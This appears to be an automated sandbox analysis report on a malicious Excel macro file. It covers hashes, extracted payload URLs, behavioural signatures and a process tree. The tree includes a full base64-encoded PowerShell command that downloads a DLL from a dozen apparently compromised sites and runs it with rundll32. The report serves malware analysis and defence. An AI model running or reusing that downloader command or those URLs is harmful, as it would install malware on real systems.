Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 23:18
Behavioral task
behavioral1
Sample
9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm
Resource
win10v2004-20241007-en
General
-
Target
9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm
-
Size
111KB
-
MD5
9af3ba776016b60198602fd3e8dfbecd
-
SHA1
9baf467e5414d0c931354a5bc83191a10d326272
-
SHA256
9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a
-
SHA512
116f81454daef37987fed2c699ff49a6a9063cc03c1cb08fb27fed06d0f115db82731c6b7eab61d363a62d3174faaa11b192f7b8f51e7e215a92804b1590cd9c
-
SSDEEP
1536:PdsEIB9RRXF9OBD4o3C8VseP12QaGZKR3K87ftgfxSS66oXzOVZdIW5DET08:FJIB/p/s4LcRtaXR3KUtE4sYzOXPr8
Malware Config
Extracted
http://reumatismclinic.com/-/scCnm3mbJRpsaBKBbrC/
https://shodhmanjari.com/wp-admin/xjEmK4Pd3N/
http://tubelocal.net/wp-admin/X4Xm4Mk/
https://pacifichomebroker.com/roderick/RRk/
https://molinai-journal.com/wp-content/4HBv/
https://marineboyrecords.com/font-awesome/QBBByHDDYl0slxlQ/
https://mashuk.net/wp-includes/ej6R4fkU/
https://lapalette.store/Fox-C404/Gngia6hD0i5zsgd2/
https://jhonnycryptic.com/cgi-bin/OhZdKCDRBYGZudqs/
https://korean911.com/wp-admin/TZczIsZtMFXxM5T/
https://fonijuk.org/wp-content/fzq6vYFUMEiRoR8vG/
https://baltoe.blog/-/6IC/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 768 868 wscript.exe 82 -
Blocklisted process makes network request 9 IoCs
flow pid Process 27 4224 powershell.exe 30 4224 powershell.exe 32 4224 powershell.exe 34 4224 powershell.exe 36 4224 powershell.exe 41 4224 powershell.exe 48 4224 powershell.exe 54 4224 powershell.exe 58 4224 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 868 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4224 powershell.exe 4224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4224 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE 868 EXCEL.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 868 wrote to memory of 768 868 EXCEL.EXE 87 PID 868 wrote to memory of 768 868 EXCEL.EXE 87 PID 768 wrote to memory of 4168 768 wscript.exe 88 PID 768 wrote to memory of 4168 768 wscript.exe 88 PID 4168 wrote to memory of 4224 4168 cmd.exe 90 PID 4168 wrote to memory of 4224 4168 cmd.exe 90 PID 768 wrote to memory of 4908 768 wscript.exe 101 PID 768 wrote to memory of 4908 768 wscript.exe 101 PID 4908 wrote to memory of 5104 4908 cmd.exe 103 PID 4908 wrote to memory of 5104 4908 cmd.exe 103 PID 4908 wrote to memory of 5104 4908 cmd.exe 103
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SYSTEM32\wscript.exewscript c:\programdata\sduoixo.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAHIAZQB1AG0AYQB0AGkAcwBtAGMAbABpAG4AaQBjAC4AYwBvAG0ALwAtAC8AcwBjAEMAbgBtADMAbQBiAEoAUgBwAHMAYQBCAEsAQgBiAHIAQwAvACwAaAB0AHQAcABzADoALwAvAHMAaABvAGQAaABtAGEAbgBqAGEAcgBpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AGoARQBtAEsANABQAGQAMwBOAC8ALABoAHQAdABwADoALwAvAHQAdQBiAGUAbABvAGMAYQBsAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBYADQAWABtADQATQBrAC8ALABoAHQAdABwAHMAOgAvAC8AcABhAGMAaQBmAGkAYwBoAG8AbQBlAGIAcgBvAGsAZQByAC4AYwBvAG0ALwByAG8AZABlAHIAaQBjAGsALwBSAFIAawAvACwAaAB0AHQAcABzADoALwAvAG0AbwBsAGkAbgBhAGkALQBqAG8AdQByAG4AYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANABIAEIAdgAvACwAaAB0AHQAcABzADoALwAvAG0AYQByAGkAbgBlAGIAbwB5AHIAZQBjAG8AcgBkAHMALgBjAG8AbQAvAGYAbwBuAHQALQBhAHcAZQBzAG8AbQBlAC8AUQBCAEIAQgB5AEgARABEAFkAbAAwAHMAbAB4AGwAUQAvACwAaAB0AHQAcABzADoALwAvAG0AYQBzAGgAdQBrAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBlAGoANgBSADQAZgBrAFUALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcABhAGwAZQB0AHQAZQAuAHMAdABvAHIAZQAvAEYAbwB4AC0AQwA0ADAANAAvAEcAbgBnAGkAYQA2AGgARAAwAGkANQB6AHMAZwBkADIALwAsAGgAdAB0AHAAcwA6AC8ALwBqAGgAbwBuAG4AeQBjAHIAeQBwAHQAaQBjAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATwBoAFoAZABLAEMARABSAEIAWQBHAFoAdQBkAHEAcwAvACwAaAB0AHQAcABzADoALwAvAGsAbwByAGUAYQBuADkAMQAxAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBUAFoAYwB6AEkAcwBaAHQATQBGAFgAeABNADUAVAAvACwAaAB0AHQAcABzADoALwAvAGYAbwBuAGkAagB1AGsALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBmAHoAcQA2AHYAWQBGAFUATQBFAGkAUgBvAFIAOAB2AEcALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGEAbAB0AG8AZQAuAGIAbABvAGcALwAtAC8ANgBJAEMALwAiAC4AcwBwAEwAaQBUACgAIgAsACIAKQA7AGYATwByAGUAYQBDAGgAKAAkAGoAZAB0AEYASgBkAFgAaAByADYAdAB4AHkAaABkACAAaQBuACAAJABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnACkAewAkAHIAaAB5AGsAYQBqAGQAaABmAHMANwBpAGQAZgBnAGQAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAHYAYgBrAHcAawAuAGQAbABsACIAOwBpAE4AdgBPAGsAZQAtAHcARQBiAHIAZQBRAHUAZQBzAFQAIAAtAHUAUgBpACAAJABqAGQAdABGAEoAZABYAGgAcgA2AHQAeAB5AGgAZAAgAC0AbwB1AFQAZgBpAEwAZQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADQANQAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd3⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
\??\c:\windows\syswow64\rundll32.exec:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd4⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD526528ca4757fa6e282c52ef3ea317a4c
SHA14fa2111555de242e5513897b7bd666c40d2fdd59
SHA2569fae0f70d7e720ef7844f6cf5830b11785935e0d0ccbeb1208157357ad2a7542
SHA512bf76af85f0535620ec99972281f59e658112ca20f883f8a342907ea948aeefef37a8baff2278fcbdf5361d8d5e970a9576efa385ec6487101e96eeebcacd6af5
-
Filesize
3KB
MD5016baa9173d80a2783f51e289ba3446c
SHA13207efbfaf61e29d86c969245008aad1fa7f9657
SHA25624cc34c301ca2213382e1be7fb5241073d6e23b390ba1b2c6fa76faa5ca5d3b4
SHA51239b79426561f73777b5f2e8349052c994329ebdbc123261123f3234291ffe4741fc6275438d092e7a449899becac30e4b2e899f9fd45c3ff1685e604a6ebf651
-
Filesize
561B
MD587a9c41dc3e67b9b0b6cdb367d4858bd
SHA100f117f9a02dad3c127b2c607ead43300c2bebbe
SHA256f0b09a17f07b03b8cfe1969f84fcfb96933439707fa86ba8aa79181145512e18
SHA5127373ca3127a1baf85e3cc6beb7b046788132b1bb388405657cb924435386d186a2645971128dc582a970242c4a3dfdc7fcce78ed158b0d430c96bbd18686f1dd
-
Filesize
1KB
MD5b31e43a162e56d32cfff6af0122284f1
SHA1c9a6a56cc9255666ebe9c46a123a4c0b2bb588a1
SHA2561c4c11ccd1cd2b2fccff4db7bdb90908cdfb395573d791540815dcea5ccdc80b
SHA512ea8280e5236fee0a2ad494095d493be210135cb98e899add64d43bf142cbc0287dda4e5b302745a867d40c0f7f846033929ac3c2fadc5ce3a061517091cbbbf2